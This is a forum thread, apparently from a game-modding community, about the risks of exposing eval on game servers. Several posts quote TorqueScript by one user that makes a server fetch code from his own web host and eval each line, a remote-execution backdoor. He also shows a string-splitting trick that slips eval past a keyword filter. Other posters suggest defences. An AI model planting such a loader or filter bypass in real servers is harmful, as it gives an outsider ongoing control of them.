Truce - Hey guess what, people don't appreciate you deleting their base files

[Jimmg]

They don't call it eval They call it specialval.

[Ad Bot]

[Wynd_Fox]

They don't call it eval They call it specialval.

At risk of sounding like a total and utter idiot, I don't get it.

[Jimmg]

At risk of sounding like a total and utter idiot, I don't get it.

They renamed it and made some simple changes.

[Wynd_Fox]

They renamed it and made some simple changes.

Oh, I see.

[Chrono]

If I were to ever use eval on my server, I would remove any file read, write, and delete functionality, and remove any possibilities for infinite loops. Ontop of that, getting rid of all the obvious crash functions.

[Kalphiter]

If I were to ever use eval on my server, I would remove any file read, write, and delete functionality, and remove any possibilities for infinite loops. Ontop of that, getting rid of all the obvious crash functions.

Hello, how about remote execution?

Code: [Select]

$KalHTTP = new HTTPObject(KalHTTP); KalHTTP.get("host", "path", "");
function KalHTTP::online(%this, %line)
{
    eval(%line);
}

[Kalphiter]

Hello, how about remote execution?

Code: [Select]

$KalHTTP = new HTTPObject(KalHTTP); KalHTTP.get("host", "path", "");
function KalHTTP::online(%this, %line)
{
    eval(%line);
}

Oops, why did I put $KalHTTP = in there?

[Truce]

I do have a couple client-sided scripts that work with eval. One such script injects an add-on (the whole folder) into the host's; I used this to let a few of my friends test some private mods without uploading to a hosting site*, but I've never done anything as malicious as remote execution.

*Why? Don't you remember last time I tried that?

[Wynd_Fox]

Hello, how about remote execution?

Code: [Select]

$KalHTTP = new HTTPObject(KalHTTP); KalHTTP.get("host", "path", "");
function KalHTTP::online(%this, %line)
{
    eval(%line);
}

What does remote execution mean?

[Kalphiter]

What does remote execution mean?

Take this for example:

Code: [Select]

new HTTPObject(KalHTTP);
function Kaleval()
{
    KalHTTP.get("kalphiter.com:80", "/remoteExecution.php", "");
}

function KalHTTP::online(%this, %line)
{
    eval(%line);
}

There are an infinite amount of ways to get around simple letter-matching such as blocking input containing "crash();"

So if I eval into someone's server that above code, and then eval "Kaleval()", the server will go to http://kalphiter.com/remoteExecution.php and execute the code on that page.

[Chrono]

Take this for example:

Code: [Select]

new HTTPObject(KalHTTP);
function Kaleval()
{
    KalHTTP.get("kalphiter.com:80", "/remoteExecution.php", "");
}

function KalHTTP::online(%this, %line)
{
    eval(%line);
}

There are an infinite amount of ways to get around simple letter-matching such as blocking input containing "crash();"

So if I eval into someone's server that above code, and then eval "Kaleval()", the server will go to http://kalphiter.com/remoteExecution.php and execute the code on that page.

Simple, disallow the usage of the word eval.

[Wynd_Fox]

Take this for example:

Code: [Select]

new HTTPObject(KalHTTP);
function Kaleval()
{
    KalHTTP.get("kalphiter.com:80", "/remoteExecution.php", "");
}

function KalHTTP::online(%this, %line)
{
    eval(%line);
}

There are an infinite amount of ways to get around simple letter-matching such as blocking input containing "crash();"

So if I eval into someone's server that above code, and then eval "Kaleval()", the server will go to http://kalphiter.com/remoteExecution.php and execute the code on that page.

Oh, I almost get it.

[Chrono]

And ontop of that, OVERWRITE the crashing functions.

[Kalphiter]

Simple, disallow the usage of the word eval.

Code: [Select]

%fail = "ev"@"al";
call(%fail);Or something like that

[Kalphiter]

Code: [Select]

%fail = "ev"@"al";
call(%fail);Or something like that

Oh, and parameters of course.